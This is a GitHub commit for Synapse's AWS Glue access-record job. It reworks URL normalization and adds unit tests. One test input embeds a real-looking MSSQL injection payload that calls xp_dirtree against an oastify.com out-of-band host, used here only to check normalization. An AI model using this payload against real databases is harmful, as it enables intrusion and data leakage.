Skip to content

Commit

Permalink
Merge pull request #42 from SandhraSokhal/PLFM-7965
Browse files Browse the repository at this point in the history
PLFM-7965
  • Loading branch information
john-hill authored Oct 6, 2023
2 parents 7bef7ec + 9c40d5e commit f6e8752
Show file tree
Hide file tree
Showing 3 changed files with 214 additions and 4 deletions.
28 changes: 26 additions & 2 deletions src/scripts/glue_jobs/process_access_record.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,8 @@

import sys
import re
import urllib.parse

from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
Expand Down Expand Up @@ -96,7 +98,7 @@ def transform(dynamic_record):


def get_normalized_method_signature(requesturl):
url = requesturl.lower()
url = decode_url(requesturl.lower())
prefix_index = url.find('/v1/')
if prefix_index == -1:
return "INVALID URL"
Expand All @@ -109,10 +111,32 @@ def get_normalized_method_signature(requesturl):
result = "/evaluation/name/#"
elif requesturl.startswith("/entity/alias"):
result = "/entity/alias/#"
elif requesturl.startswith("/2fa"):
result = requesturl
elif requesturl.startswith("/user/bundle"):
result = "/user/bundle"
elif "/access/" in requesturl:
result = "/objects/#/access/#"
elif "/schema/type/" in requesturl:
result = "/schema/type/#"
else:
result = re.sub("/(syn\\d+|\\d+)", "/#", requesturl)
# find and remove substring in url starting from ';' until '/' if present.
result = re.sub(r';[^/]+', '', requesturl)
# find and remove special characters in url
result = re.sub(r'[\'!@$%^&*()_+{}\[\]:;<>,.?~\\|=]+', '', result)
# find and replace substrings with length >=2 in url containing ids with '#'. ID can start with 'syn',
# 'fh' or digits.
result = re.sub(r'\b(syn|fh)\d+(\.\d+)?\b|\b\d+(\w+)?[^/]\b', '#', result)
# The regex provided above doesn't account for substrings with a length of 1.
# Find and replace substring in url containing only digits.
result = re.sub(r'/\d+', '/#', result)
return result

def decode_url(encoded_url):
if encoded_url is None:
return None
decoded_url = urllib.parse.unquote(encoded_url)
return "".join(decoded_url.split())

def get_client(user_agent):
if user_agent is None:
Expand Down
3 changes: 1 addition & 2 deletions src/scripts/glue_jobs/utils.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,8 +17,7 @@ def syn_id_string_to_int(input_string):
def ms_to_partition_date(timestamp_ms):
return datetime.utcfromtimestamp(timestamp_ms / 1000.0).strftime("%Y-%m-%d")


def remove_padded_leading_zeros(input_string):
if input_string is None:
return input_string
return input_string.lstrip("0")
return input_string.lstrip("0")
187 changes: 187 additions & 0 deletions tests/test_process_access_record.py
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,193 @@ def test_normalized_signature_for_random_valid_url(self):
real_output = process_access_record.get_normalized_method_signature("repo/v1/admin/locks")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_space_at_end(self):
expected_output = "/entity/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn35487770%20")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_space_before_synId(self):
expected_output = "/entity/#/annotations2"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/%20syn24829449/annotations2")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_space_in_middle(self):
expected_output = "/entity/#/uploaddestination"
real_output = process_access_record.get_normalized_method_signature(
"/file/v1/entity/syn52201498%20%20/uploadDestination")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_squareBracket(self):
expected_output = "/accessrequirement/#/submissions"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/accessRequirement/%5B9605670%5D/submissions")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_synId_with_version(self):
expected_output = "/entity/#/table/transaction/async/get/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn51718024.1/table/transaction/async/get/28738082")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_special_char_at_end(self):
expected_output = "/entity/#/wiki/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn6131484/wiki/402033@")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_semicolon_with_url(self):
expected_output = "/entity/#/wiki/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn4939906/wiki/235909;%20Combination%20Index%20Validation%20Studies%20(2%20drug%20combinations)%20-%20syn4939876%20-%20Wiki%20(Synapse | Sage Bionetworks ")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_semicolon_with_text(self):
expected_output = "/entity/#/wiki/"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn3193805/wiki/;D12")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_semicolon_in_middle(self):
expected_output = "/entity/#/wiki2/#/wikihistory"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn2811262/wiki2/78388;/wikihistory")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_semicolon_in_middle_with_text(self):
expected_output = "/entity/#/wiki2/#/wikihistory"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn2811262/wiki2/78388;DA12/wikihistory")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_new_line(self):
expected_output = "/entity/#/uploaddestination"
real_output = process_access_record.get_normalized_method_signature(
"/file/v1/entity/syn51320810%0A/uploadDestination")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_multiple_new_line(self):
expected_output = "/entity/#/bundle2"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn26592177%0A%0A/bundle2")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_carriageReturn(self):
expected_output = "/entity/#/annotations2"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn50920803%0D%0D/annotations2")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_multiple_carriageReturn(self):
expected_output = "/entity/#/bundle2"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/entity/syn50920803%0D%0D/bundle2")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_with_carriageReturn_before_synId(self):
expected_output = "/entity/#/uploaddestination"
real_output = process_access_record.get_normalized_method_signature(
"/file/v1/entity/%09%0Asyn51770520/uploadDestination")
print("print its working")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_drs_access_url_with_synId(self):
expected_output = "/objects/#/access/#"
real_output = process_access_record.get_normalized_method_signature(
"/ga4gh/drs/v1/objects/syn27076339.1/access/FileEntity_syn27076339.1_88312772")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_drs_access_url_with_filehandleId(self):
expected_output = "/objects/#/access/#"
real_output = process_access_record.get_normalized_method_signature(
"/ga4gh/drs/v1/objects/fh127243131/access/127243131")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_drs_object(self):
expected_output = "/objects/#"
real_output = process_access_record.get_normalized_method_signature("/ga4gh/drs/v1/objects/syn35423183.1")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_drs_object_for_fileHandleId(self):
expected_output = "/objects/#"
real_output = process_access_record.get_normalized_method_signature("/ga4gh/drs/v1/objects/fh123")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_schema_type(self):
expected_output = "/schema/type/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/schema/type/registered/a245ac37480fc40739836ce61801d19f1-my.schema-0.36652.1")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_evaluation_submission_with_string_id(self):
expected_output = "/evaluation/submission/#/status"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/evaluation/submission/9720221_curl_168/status")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_evaluation_submission_with_file_handle_id(self):
expected_output = "/evaluation/submission/#/file/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/evaluation/submission/9720221_curl_168/file/123")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_data_access_submission_id_with_vr(self):
expected_output = "/dataaccesssubmission/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/dataAccessSubmission/7416vr")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_entity_with_version_in_end(self):
expected_output = "/entity/#/version/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn9692796/version/98")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_entity_with_vesion_in_middle(self):
expected_output = "/entity/#/version/#/json"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/entity/syn25830585/version/1/json")
self.assertEqual(expected_output, real_output)


def test_normalized_signature_for_team_member_with_query_parameters(self):
expected_output = "/teammembers/#"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/teamMembers/3431460&limit=50&offset=0")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_team_with_singleQuotes(self):
expected_output = "/team/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011'")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_team_with_bracket(self):
expected_output = "/team/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011)")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_team_with_comma(self):
expected_output = "/team/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011,")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_team_with_dot(self):
expected_output = "/team/#"
real_output = process_access_record.get_normalized_method_signature("/repo/v1/team/3409011.")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_bundle(self):
expected_output = "/user/bundle"
real_output = process_access_record.get_normalized_method_signature(
"/repo/v1/user/bundle;declare%20@q%20varchar(99);set%20@q='%5C%5Cb2eg7v959m35phq0mzthfsysajgf491a0yroff72xqm.oasti'+'fy.com%5Cfmt';%20exec%20master.dbo.xp_dirtree%20@q;--%20")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_twoFA(self):
expected_output = "/2fa/enroll"
real_output = process_access_record.get_normalized_method_signature("/auth/v1/2fa/enroll")
self.assertEqual(expected_output, real_output)

def test_normalized_signature_for_twoFA(self):
expected_output = "/2fa/enroll"
real_output = process_access_record.get_normalized_method_signature("/auth/v1/2fa/enroll")
self.assertEqual(expected_output, real_output)

def test_get_client_for_web(self):
expected_output = "WEB"
real_output = process_access_record.get_client("Synapse-Web-Client/435.0")
Expand Down

0 comments on commit f6e8752

Please sign in to comment.